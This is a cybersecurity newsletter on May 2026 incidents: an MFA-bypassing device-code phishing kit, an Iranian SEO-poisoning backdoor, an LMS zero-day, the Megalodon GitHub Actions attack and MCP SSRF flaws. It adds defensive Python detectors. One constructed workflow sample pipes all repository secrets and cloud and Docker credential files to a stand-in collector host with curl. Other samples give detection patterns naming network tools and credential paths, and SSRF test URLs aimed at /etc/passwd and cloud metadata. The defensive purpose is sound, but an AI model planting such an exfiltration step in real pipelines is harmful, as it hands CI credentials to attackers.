The Lyceum: Cyber Intelligence Daily — May 26, 2026
Tuesday, May 26, 2026
The Big Picture
Today's signal is not "one giant breach" — it's "the attack surface is wherever people got comfortable." A phishing kit is turning Microsoft's own login flow into an MFA bypass, an Iranian IRGC-linked crew is poisoning Bing search results to deliver an AI-coded backdoor, a niche Japanese learning platform got turned into a malware launcher because someone hard-coded a cryptographic key, and 5,500 GitHub repos got vacuumed for secrets in six hours. The throughline: attackers are skipping the front door entirely and walking in through the training portal, the search bar, and the CI/CD pipeline.
What Just Dropped
- CVE-2026-5426 — Digital Knowledge KnowledgeDeliver LMS: patched, exploited as a zero-day. Hard-coded ASP.NET machineKey values across deployments enabled unauthenticated RCE leading to Godzilla webshell and Cobalt Strike deployment.
- CVE-2026-26980 — Ghost CMS: patched in 6.19.1, actively exploited at scale. SQL injection used to steal admin API keys and inject malicious JavaScript across 700+ sites including university, fintech, and AI publishers.
- CVE-2026-34472 / CVE-2026-34473 / CVE-2026-34474 — ZTE ZXHN H-series CPE routers: no confirmed patch for operator firmware. Unauthenticated info disclosure of admin/WLAN/PPPoE credentials plus oversized-POST DoS across 17 router models distributed by ISPs globally.
- MiniFast backdoor — Iran/IRGC-aligned Nimbus Manticore: actively deployed via SEO-poisoned fake SQL Developer download page. 64-bit Windows backdoor that masquerades C2 traffic as Chrome activity; code style suggests AI-assisted development.
- Kali365 PhaaS — Microsoft 365: actively exploited. Phishing-as-a-service kit sold on Telegram that abuses Microsoft's legitimate device-code login flow to capture OAuth tokens, bypassing MFA without ever phishing a password.
- Windows Snipping Tool NTLMv2 hash hijack — Exploit-DB entry published, no CVE assigned yet. Local privilege escalation path that captures NTLMv2 hashes via a default-installed Windows utility.
Today's Stories
Kali365 Turns Microsoft's Own Login Page Into an MFA Bypass
The FBI issued a public service announcement overnight on Kali365 — a phishing-as-a-service kit sold through Telegram since April 2026 that hands low-skill criminals the ability to hijack Microsoft 365 sessions without stealing a password, without intercepting an SMS code, and without ever building a fake login page.
The mechanism is what makes this nasty. The attacker starts a device-code sign-in from their own machine, which yields a short user code. The victim is then sent to Microsoft's real device-code authentication page — the legitimate one — and prompted to enter that code. Entering it completes the attacker's pending sign-in, not one for the victim's own device. When the victim finishes authenticating, including MFA, the criminal's client receives OAuth access and refresh tokens — a reusable hall pass to Outlook, Teams, OneDrive, and any other linked app, valid until the refresh token expires or is revoked. There is no fake page to spot. There is no MFA prompt to second-guess, because the victim satisfies MFA on the attacker's behalf. The user did, in fact, log into Microsoft.
What changes if this works at scale: the entire "train users to spot phishing pages" defensive posture stops mattering for Microsoft 365 because there is no phishing page to spot. The FBI says Kali365 ships with AI-written lures, campaign templates, real-time victim tracking, and token capture — Phishing-as-a-Service has now matured into something closer to Salesforce-for-criminals.
What to watch: if enterprise breach reports over the next two weeks start citing "device-code abuse" as the initial vector, restricting device-code authentication via Conditional Access becomes the new "disable SMB v1" — a one-line config change that retroactively explains a lot of compromises.
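Two things a tenant admin wants in hand after reading this: a way to find device-code sign-ins that look like a kit's token sink, and the Conditional Access policy that blocks the flow. The example below is added here and is not from the FBI PSA or from Microsoft. The sign-in records are constructed to mirror the shape of Microsoft Graph `signIn` objects (`authenticationProtocol`, `appDisplayName`, `ipAddress`); the set of apps for which device-code sign-in is expected is an assumption to tune per tenant, and the baseline of "normal" IPs is derived from the interactive sign-ins in the same batch, which a real deployment would replace with a longer history.

```python
"""Device-code abuse: find it in Entra ID sign-in logs, then block it with Conditional Access.

Added example. Records are constructed in the shape of Microsoft Graph signIn objects (trimmed).
"""
from collections import defaultdict

# Constructed sample sign-ins: 203.0.113.10 is the office egress, 198.51.100.77 is an IP that
# completes device-code sign-ins for two different users (the pattern a PhaaS token relay leaves).
SAMPLE_SIGNINS = [
    {"id": "0", "userPrincipalName": "bob@example.com", "authenticationProtocol": "oAuth2",
     "appDisplayName": "Azure Portal", "ipAddress": "203.0.113.10"},
    {"id": "1", "userPrincipalName": "alice@example.com", "authenticationProtocol": "oAuth2",
     "appDisplayName": "Microsoft Teams", "ipAddress": "203.0.113.10"},
    {"id": "2", "userPrincipalName": "alice@example.com", "authenticationProtocol": "deviceCode",
     "appDisplayName": "Microsoft Office", "ipAddress": "198.51.100.77"},
    {"id": "3", "userPrincipalName": "bob@example.com", "authenticationProtocol": "deviceCode",
     "appDisplayName": "Microsoft Azure CLI", "ipAddress": "203.0.113.10"},
    {"id": "4", "userPrincipalName": "carol@example.com", "authenticationProtocol": "deviceCode",
     "appDisplayName": "Microsoft Office", "ipAddress": "198.51.100.77"},
]

# Assumption: the only app in this tenant that legitimately uses device code is the Azure CLI.
EXPECTED_DEVICE_CODE_APPS = {"Microsoft Azure CLI"}


def find_device_code_abuse(signins, expected_apps=EXPECTED_DEVICE_CODE_APPS):
    """Return device-code sign-ins that deserve a look, each with the reasons it was flagged."""
    baseline_ips = defaultdict(set)   # user -> IPs seen on non-device-code sign-ins
    ip_users = defaultdict(set)       # IP -> users who completed a device-code sign-in from it
    for s in signins:
        if s.get("authenticationProtocol") == "deviceCode":
            ip_users[s.get("ipAddress")].add(s["userPrincipalName"])
        else:
            baseline_ips[s["userPrincipalName"]].add(s.get("ipAddress"))

    findings = []
    for s in signins:
        if s.get("authenticationProtocol") != "deviceCode":
            continue
        reasons = []
        if s.get("appDisplayName") not in expected_apps:
            reasons.append(f"device-code sign-in to unexpected app {s.get('appDisplayName')!r}")
        if s.get("ipAddress") not in baseline_ips[s["userPrincipalName"]]:
            reasons.append("IP never seen on this user's interactive sign-ins")
        if len(ip_users[s.get("ipAddress")]) > 1:
            reasons.append("same IP completed device-code sign-ins for multiple users")
        if reasons:
            findings.append({"id": s["id"], "user": s["userPrincipalName"],
                             "ip": s.get("ipAddress"), "reasons": reasons})
    return findings


def build_block_device_code_policy(exclude_group_ids=()):
    """Body for POST /identity/conditionalAccess/policies that blocks the device code flow.

    Starts in report-only so the hits can be reviewed; flip "state" to "enabled" afterwards.
    The excluded groups are for break-glass / headless-device accounts that genuinely need it.
    """
    return {
        "displayName": "Block device code flow",
        "state": "enabledForReportingButNotEnforced",
        "conditions": {
            "users": {"includeUsers": ["All"], "excludeGroups": list(exclude_group_ids)},
            "applications": {"includeApplications": ["All"]},
            "clientAppTypes": ["all"],
            "authenticationFlows": {"transferMethods": "deviceCodeFlow"},
        },
        "grantControls": {"operator": "OR", "builtInControls": ["block"]},
    }


if __name__ == "__main__":
    for f in find_device_code_abuse(SAMPLE_SIGNINS):
        print(f["id"], f["user"], f["ip"], "; ".join(f["reasons"]))
```

Alice's and Carol's sign-ins are flagged on all three counts; Bob's Azure CLI sign-in from the office IP is not. When the policy goes live, revoke refresh tokens for anyone the detection already caught, since blocking the flow does not invalidate tokens that were issued before the block.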
Iran's IRGC Is Poisoning Your Search Results to Deliver an AI-Built Backdoor
Check Point Research dropped a detailed report overnight on Nimbus Manticore (also tracked as UNC1549) — an IRGC-affiliated Iranian threat group that ran three distinct attack waves between February and April 2026, timed to Operation Epic Fury, the U.S. military campaign against Iran. The targets: aviation, defense, telecom, and software firms across the United States, Europe, and the Middle East.
The new technique is what defenders should pay attention to. For the first time, Check Point observed Nimbus Manticore using SEO poisoning — manipulating search rankings so the attacker's malicious download page appears at the top of results. The group registered getsqldeveloper[.]com, a near-perfect impersonation of Oracle's SQL Developer download page, and at the time of analysis it ranked near the top of Bing and DuckDuckGo results for "sql developer." No phishing email. No social engineering pretext. Just a developer doing what developers do — searching for a tool — and getting a weaponized installer that drops a new backdoor called MiniFast.
MiniFast is a 64-bit Windows backdoor that disguises its C2 traffic as Chrome browser activity. It runs shell commands, manages files, exfiltrates data, and attempts privilege escalation. Check Point notes that the code shows hallmarks of AI-assisted development — excessive error handling, verbose function names, detailed debug strings — patterns common in LLM-generated code. That inference deserves caution; code style is suggestive, not conclusive.
What changes: if searching for the tool you need becomes a credible initial access vector for nation-state actors, every developer workstation is now part of the threat model in a way that perimeter controls don't address. Defenders should monitor for unexpected scheduled task creation and unusual DLL loading — the operational tells Check Point flagged for this campaign.
The LMS That Became a Malware Launcher: KnowledgeDeliver Zero-Day Drops Godzilla and Cobalt Strike
Training software rarely makes headlines until it starts serving malware to whoever visits it. Google Mandiant and Google Threat Intelligence Group disclosed overnight that a flaw in Digital Knowledge's KnowledgeDeliver — a learning management system widely used in Japan — was exploited as a zero-day to plant the Godzilla webshell and push Cobalt Strike Beacon onto end-user machines. Deployments prior to February 24, 2026, are affected.
The bug is CVE-2026-5426, rated 7.5, and the root cause sounds boring until you sit with it: hard-coded ASP.NET machineKey values shipped across customer deployments. The machineKey is the secret ASP.NET uses to sign and encrypt ViewState, forms-authentication cookies, and similar tokens, so one shared secret meant a key learned from one KnowledgeDeliver install could forge those artifacts, and with them authenticated requests, against every other. Per Mandiant's findings, attackers used the flaw for unauthenticated RCE, loosened file permissions, modified a legitimate JavaScript file on the LMS, and then served users a fake "security authentication plugin" prompt that delivered malware. A server compromise became a client compromise — one shared secret, many victims.
What changes if more vendors are found shipping shared keys in deployment templates: this stops being a Japan-only story. The "hard-coded crypto material in shared software" failure mode is the same class of bug that turned Salt Communications, Atlassian Bitbucket, and a half-dozen other vendors into one-key-fits-all environments over the past 18 months. The observable signal: if Mandiant or JPCERT publish additional victim names this week, the surface area is bigger than one LMS.
If you run KnowledgeDeliver, or any customer does: confirm the deployment is on a build from February 24, 2026 or later, replace the machineKey and any other shared secrets with values unique to that installation (existing ViewState and forms-authentication cookies will be invalidated when you do, which is the point), audit the LMS's JavaScript files for unauthorized modification, and ask users whether they were prompted to install anything.
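The fleet-wide check that finding implies, as an added example (not Digital Knowledge's code or Mandiant's tooling): pull the web.config from each host, extract the static machineKey if one is set, and report any key that appears on more than one host. The four configs below are constructed, with dummy hex key material; the host names are placeholders. The last function mints replacement keys at the sizes ASP.NET uses for HMACSHA256 validation (64 bytes) and AES decryption (32 bytes), which is the rotation step for any host the audit flags.

```python
"""Fleet-wide ASP.NET machineKey audit plus replacement-key generation. Added example."""
import secrets
import xml.etree.ElementTree as ET
from collections import defaultdict

# Constructed dummy keys; two hosts share them, which is the one-key-fits-all condition.
SHARED_VALIDATION_KEY = "AB" * 64   # 64 bytes as hex
SHARED_DECRYPTION_KEY = "CD" * 32   # 32 bytes as hex


def _config(validation_key, decryption_key):
    """Minimal web.config excerpt with a static <machineKey> (constructed)."""
    return f"""<configuration>
  <system.web>
    <machineKey validationKey="{validation_key}" decryptionKey="{decryption_key}"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>"""


SAMPLE_CONFIGS = {
    "lms-a.example.jp": _config(SHARED_VALIDATION_KEY, SHARED_DECRYPTION_KEY),
    "lms-b.example.jp": _config(SHARED_VALIDATION_KEY, SHARED_DECRYPTION_KEY),
    "lms-c.example.jp": _config("EF" * 64, "01" * 32),   # static but unique: fine for a web farm
    "lms-d.example.jp": """<configuration><system.web>
  <machineKey validationKey="AutoGenerate,IsolateApps" decryptionKey="AutoGenerate,IsolateApps" />
</system.web></configuration>""",
}


def extract_machine_key(config_text):
    """Return the <machineKey> attributes from a web.config, or None when the element is absent."""
    root = ET.fromstring(config_text)
    elem = root.find(".//machineKey")
    return dict(elem.attrib) if elem is not None else None


def audit_fleet(configs):
    """Group hosts by static validationKey. Any key on more than one host is a shared secret."""
    by_key = defaultdict(list)
    auto, missing = [], []
    for host, text in configs.items():
        mk = extract_machine_key(text)
        if mk is None:
            missing.append(host)          # framework default (AutoGenerate,IsolateApps) applies
            continue
        vk = mk.get("validationKey", "")
        if vk.startswith("AutoGenerate"):
            auto.append(host)             # per-machine key, cannot be shared across installs
        else:
            by_key[vk.upper()].append(host)
    shared = {k: sorted(v) for k, v in by_key.items() if len(v) > 1}
    unique_static = sorted(h for hs in by_key.values() if len(hs) == 1 for h in hs)
    return {"shared": shared, "unique_static": unique_static,
            "auto_generated": sorted(auto), "missing": sorted(missing)}


def new_machine_key():
    """Mint a fresh static <machineKey>: 64-byte validationKey (HMACSHA256), 32-byte decryptionKey (AES)."""
    return (f'<machineKey validationKey="{secrets.token_hex(64).upper()}" '
            f'decryptionKey="{secrets.token_hex(32).upper()}" '
            'validation="HMACSHA256" decryption="AES" />')


if __name__ == "__main__":
    report = audit_fleet(SAMPLE_CONFIGS)
    for key, hosts in report["shared"].items():
        print(f"SHARED validationKey {key[:8]}... on {', '.join(hosts)}")
    print("replacement:", new_machine_key())
```

A static key is not itself the defect: web farms need one so every node validates the same ViewState. The defect is the same static key across unrelated installations, so the audit keys on repetition, not on the presence of a static value.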
5,500 GitHub Repos Quietly Poisoned in the "Megalodon" Supply-Chain Attack
This is the kind of supply-chain story that makes developers stare into the middle distance for a minute. SecurityWeek, citing SafeDep, reports that 5,718 malicious commits hit 5,561 GitHub repositories in just six hours on May 18. The injected GitHub Actions workflows were designed to vacuum up everything that lives in a CI/CD environment: AWS, Azure, and Google Cloud credentials, SSH keys, API tokens, database connection strings, Docker and Kubernetes configs. One payload established a dormant backdoor using GitHub Actions' workflow_dispatch trigger: a workflow that never fires on push or pull request, only when the attacker invokes it through the REST API, so it sits in your repo waiting for that call and leaves no commit trail when it runs.
What changes: the trust model under CI/CD pipelines was already fraying — the Shai-Hulud worm, the TanStack mess, the VS Code extension breach that hit GitHub's own internal repos — and Megalodon is the same playbook automated to industrial scale. Your build pipeline is now a credential reservoir attackers can drain in a single afternoon.
What failure looks like: if SafeDep's victim count keeps climbing this week, expect a forced credential rotation event across the major cloud providers — the kind that breaks production and dominates ops Slack channels for three days. The observable signal: GitHub announces additional commit-signing or workflow-execution restrictions, the way they did after Shai-Hulud.
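A first-pass triage for the workflows already in your repos, added here as an example and not SafeDep's detection logic or any Megalodon payload. It scores each step on whether it reads secrets or credential files and whether the same step moves data off the runner, flags unpinned actions, and raises the severity when the only trigger is workflow_dispatch. The two workflows are constructed to match the report's description and are given as already-parsed dicts, the shape `yaml.safe_load` returns; the placeholder commit SHA, the collector hostname, and the file paths are assumptions. One loader quirk is handled deliberately: PyYAML parses a bare `on:` key as the boolean True (YAML 1.1), so the scanner accepts either key.

```python
"""Triage GitHub Actions workflows for secret harvesting and workflow_dispatch backdoors. Added example."""
import re

# Patterns an injected workflow needs: read the secrets, then move them off the runner.
SECRET_ACCESS = re.compile(r"toJSON\(\s*secrets\s*\)|secrets\.\w+|\bprintenv\b|\benv\s*\|")
CRED_FILES = re.compile(r"\.aws/credentials|\.ssh/|\.kube/config|\.docker/config\.json|\.npmrc|\.pypirc|\.git-credentials")
EGRESS = re.compile(r"\b(curl|wget|nc|ncat|Invoke-WebRequest|Invoke-RestMethod)\b")
OBFUSCATION = re.compile(r"\b(base64|xxd|openssl enc|gzip)\b")
PINNED_SHA = re.compile(r"@[0-9a-f]{40}$")

# Constructed sample workflows, as parsed by yaml.safe_load. SHA and hostname are placeholders.
SAMPLE_WORKFLOWS = {
    ".github/workflows/ci.yml": {
        "on": {"push": {"branches": ["main"]}, "pull_request": {}},
        "jobs": {"build": {"runs-on": "ubuntu-latest", "steps": [
            {"uses": "actions/checkout@8e5e7e5ab8b370d6c329ec480221332ada57f0ab"},
            {"run": "npm ci && npm test"},
        ]}},
    },
    ".github/workflows/sync.yml": {
        True: {"workflow_dispatch": {}},     # `on:` became True in the loader
        "jobs": {"sync": {"runs-on": "ubuntu-latest", "steps": [
            {"uses": "actions/checkout@v4"},
            {"run": "echo '${{ toJSON(secrets) }}' | base64 -w0 > /tmp/s\n"
                    "cat ~/.aws/credentials ~/.docker/config.json >> /tmp/s 2>/dev/null\n"
                    "curl -s -X POST --data-binary @/tmp/s https://collector.invalid/upload"},
        ]}},
    },
}


def _triggers(workflow):
    """Normalise the trigger spec (string, list, or mapping) to a set of event names."""
    on = workflow.get("on", workflow.get(True))
    if isinstance(on, str):
        return {on}
    if isinstance(on, list):
        return set(on)
    return set((on or {}).keys())


def _steps(workflow):
    for job_name, job in (workflow.get("jobs") or {}).items():
        for idx, step in enumerate(job.get("steps") or []):
            yield job_name, idx, step


def triage_workflow(name, workflow):
    """Return (location, severity, message) findings for one parsed workflow."""
    findings = []
    for job, idx, step in _steps(workflow):
        where = f"{name}:{job}[{idx}]"
        run = step.get("run") or ""
        reads = bool(SECRET_ACCESS.search(run) or CRED_FILES.search(run))
        sends = bool(EGRESS.search(run))
        if reads and sends:
            findings.append((where, "HIGH", "reads secrets or credential files and egresses in the same step"))
        elif reads and OBFUSCATION.search(run):
            findings.append((where, "MEDIUM", "encodes secret material (staging for exfiltration)"))
        elif reads:
            findings.append((where, "LOW", "touches secrets or credential files"))
        uses = step.get("uses") or ""
        if uses and not PINNED_SHA.search(uses):
            findings.append((where, "LOW", f"action not pinned to a commit SHA: {uses}"))
    if _triggers(workflow) == {"workflow_dispatch"} and any(sev == "HIGH" for _, sev, _ in findings):
        findings.append((name, "HIGH", "workflow_dispatch-only trigger plus exfiltration: dormant, API-callable backdoor"))
    return findings


if __name__ == "__main__":
    for wf_name, wf in SAMPLE_WORKFLOWS.items():
        for where, sev, msg in triage_workflow(wf_name, wf):
            print(f"{sev:6} {where}: {msg}")
```

Run it over every file under `.github/workflows/` in every repo the organisation owns, not just the active ones; Megalodon's value to the attacker was breadth, and the dormant dispatch job is exactly the thing nobody looks at in a repo that "does nothing".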
⚡ What Most People Missed
- Ghost CMS is still punishing laggards. The large-scale ClickFix campaign exploiting CVE-2026-26980 in Ghost CMS is still landing on sites that haven't patched to 6.19.1 — 700+ domains compromised so far, including university and AI publisher sites. Patching closes the injection, but if your team didn't rotate admin API keys afterwards, any keys already stolen keep working against your instance.
- A fake Claude AI page is distributing ACR Stealer right now. SANS Internet Storm Center's diary entry, published overnight, documents malicious Google ads leading users searching for Claude to a lookalike page that drops credential-stealing malware. Same ClickFix-style social engineering that hit Ghost sites last week — the delivery model is more durable than the malware.
- ZTE router CVEs dropped on Full Disclosure with no Western press pickup. Seventeen ZTE H-series CPE router models — the ones ISPs hand to home and small-business subscribers across Asia, Africa, and parts of Europe — have unauthenticated config-disclosure flaws (admin, WLAN, and PPPoE credentials) and an oversized-POST DoS. ZTE says firmware released after March 2021 isn't vulnerable, but ISP firmware update cycles are measured in years, not months. The Mirai-shaped gap between vendor patch and customer reality is the actual exposure.
- Cybercriminals are flooding the web with FIFA World Cup 2026 scams — before the tournament even starts. CTM360 uncovered 7,000+ themed domains, with 4,500+ registered in just the last five months and 1,000+ malicious sites already live. The scam infrastructure is being built now, before most people are thinking about it.
- New SSRF disclosures in Anthropic and Microsoft MCP servers landed via Full Disclosure. Researchers are bypassing vendor coordination on Model Context Protocol vulnerabilities because Microsoft declined to assign a CVE for its own playwright-mcp flaw and Anthropic has declined to modify its protocol architecture. Per the disclosed research, over 36.7% of audited MCP servers have potential SSRF exposure: a tool that fetches whatever URL the model hands it does so from the server's own network position, reaching internal services and cloud metadata endpoints the caller could never touch directly. MCP is becoming load-bearing AI infrastructure faster than anyone is auditing it.
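The egress check any URL-fetching tool in an MCP server needs, as an added example; this is not code from Anthropic, Microsoft, or any server named in the disclosures. It refuses non-HTTP schemes and userinfo, resolves the host, rejects every answer that is not a globally routable unicast address (loopback, RFC 1918, link-local including the 169.254.169.254 metadata address, IPv4-mapped IPv6), and returns the vetted IP for the client to pin. The resolver is injected so the block runs offline against a constructed name table; in production pass a `socket.getaddrinfo`-backed function, and connect to the returned address rather than re-resolving the hostname, which is what closes the DNS-rebinding window.

```python
"""SSRF guard for a URL-fetching tool: validate, resolve, reject non-public answers, pin the IP. Added example."""
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed name table standing in for DNS. 1.2.3.4 / 5.6.7.8 are arbitrary public addresses.
FAKE_DNS = {
    "docs.example.com": ["1.2.3.4"],
    "localhost": ["127.0.0.1"],
    "metadata.internal": ["169.254.169.254"],
    "rebind.example.net": ["5.6.7.8", "10.0.0.5"],   # one public answer, one private: still refused
    "ipv6doc.example.org": ["2001:db8::10"],
}


def fake_resolve(host):
    """Offline stand-in for socket.getaddrinfo; raises ValueError like an NXDOMAIN would be surfaced."""
    try:
        return FAKE_DNS[host]
    except KeyError:
        raise ValueError(f"unresolvable host {host!r}")


def _is_forbidden_ip(ip):
    """Only globally routable unicast addresses may be fetched on the model's behalf."""
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped              # ::ffff:10.0.0.5 is 10.0.0.5 in disguise
    return (ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_multicast
            or ip.is_reserved or ip.is_unspecified or not ip.is_global)


def validate_fetch_target(url, resolve=fake_resolve):
    """Return (True, pinned_ip) when the URL may be fetched, else (False, reason)."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username or parts.password:
        return False, "userinfo in URL not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        candidates = [ipaddress.ip_address(host)]      # literal IP: no DNS, same range checks
    except ValueError:
        try:
            candidates = [ipaddress.ip_address(a) for a in resolve(host)]
        except ValueError as exc:
            return False, str(exc)
    for ip in candidates:
        if _is_forbidden_ip(ip):
            return False, f"{host} resolves to non-public address {ip}"
    # The HTTP client must connect to this address and send Host: <host>, not resolve again.
    return True, str(candidates[0])


if __name__ == "__main__":
    for u in ("https://docs.example.com/page", "http://metadata.internal/latest/meta-data/",
              "http://rebind.example.net/", "http://[::ffff:10.0.0.5]/", "file:///etc/passwd"):
        print(u, "->", validate_fetch_target(u))
```

The rebind case is the one most guards miss: if any answer for the name is non-public, the fetch is refused outright, because the client cannot control which answer the OS connects to unless it pins the address itself.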
From the Foreign Press
CISA Stored Credentials and Other Secrets in an Open GitHub Repository
Russian-language outlet Xakep reported overnight that CISA — the U.S. Cybersecurity and Infrastructure Security Agency, the federal body that tells everyone else to clean up their secret hygiene — left credentials and other sensitive material in a public GitHub repository. This builds on Brian Krebs's earlier reporting from May that flagged CISA's DevSecOps credentials in a public repo, but Xakep's coverage is the first to surface the additional secrets and the broader scope of the exposure. The agency whose May 27 KEV deadline is forcing federal agencies to patch CVE-2026-9082 (Drupal SQL injection) by tomorrow night is also the agency whose own GitHub hygiene now warrants its own incident report. Source: Xakep.ru — Russian. No English-language coverage confirmed at time of publication.
CERT-UA Documents Updated UAC-0057 Toolkit: OYSTERFRESH, OYSTERSHUCK, and OYSTERBLUES
Ukraine's national CERT published a fresh advisory cataloging three new malware families deployed by the cluster it tracks as UAC-0057, a group long associated with Belarus-aligned operations against Ukrainian and EU institutions. The advisory describes a phishing wave using Prometheus-themed lures against Ukrainian government targets, with the OYSTER family providing initial access, persistence, and lateral movement capabilities. The naming convention — OYSTERFRESH, OYSTERSHUCK, OYSTERBLUES — suggests a deliberate operational refresh rather than incremental updates, and the timing aligns with the broader UAC-0057 tempo CERT-UA has documented through the spring. Western threat intel hasn't echoed this advisory yet, but the advisory's IOCs are published and the TTPs map cleanly onto prior UAC-0057 campaigns. Source: CERT-UA — Ukrainian. No English-language coverage confirmed at time of publication.
Megalodon Attack Hit More Than 5,500 GitHub Repositories
Xakep's overnight coverage of the Megalodon supply-chain attack adds detail to SafeDep's English-language disclosure: the attack used compromised maintainer credentials and automated commit-injection workflows to push malicious GitHub Actions across thousands of repos in a six-hour window. The Russian-language coverage includes specific technical detail on the workflow_dispatch backdoor mechanism and the credential-harvesting payload structure that hasn't surfaced in English reporting yet. Source: Xakep.ru — Russian. No English-language coverage confirmed at time of publication.
📅 What to Watch
- If enterprise breach reports over the next two weeks cite "device-code abuse" as the initial vector, restricting device-code authentication via Conditional Access becomes the new "disable SMB v1" — a config change that retroactively explains a lot of compromises.
- If Mandiant or JPCERT publish additional KnowledgeDeliver victim names this week, the "hard-coded crypto material in deployment templates" failure mode is structural across vendors, not isolated to one LMS.
- If federal agencies miss tomorrow's May 27 KEV deadline on CVE-2026-9082 (Drupal SQL injection), CISA's emergency directive arrives within days — and the state-and-local Drupal compromise wave that follows will surface in headlines weeks later as "unrelated" municipal ransomware incidents.
- If SafeDep's Megalodon victim count keeps climbing, expect GitHub to ship mandatory commit-signing or workflow-execution restrictions, the way it did after Shai-Hulud — and a forced credential rotation event across the major cloud providers.
- If the ZTE router CVEs see exploitation telemetry before ISPs push firmware updates, the next Mirai-class IoT botnet is already being assembled — and we'll learn about it from DDoS volumetrics, not vendor advisories.
- If a CVE gets assigned to the Windows Snipping Tool NTLMv2 hash hijack in the next 48 hours, every red team in North America has a new default-installed credential capture primitive — and the EDR signature lag will be visible in incident response reports through July.
The Closer
Tonight: an Iranian operator typing "make this backdoor look more like Chrome" into a chatbot, 5,561 GitHub repos getting frisked in the time it takes to watch The Godfather, and the FBI explaining that Microsoft's real login page is now the phishing page. CISA, meanwhile, is busy enforcing tomorrow's KEV deadline from a GitHub repo it apparently forgot to set to private.
Stay skeptical of the login that worked.
Forward this to the developer in your life who just searched for "sql developer download" — they'll want to know before their next Bing result.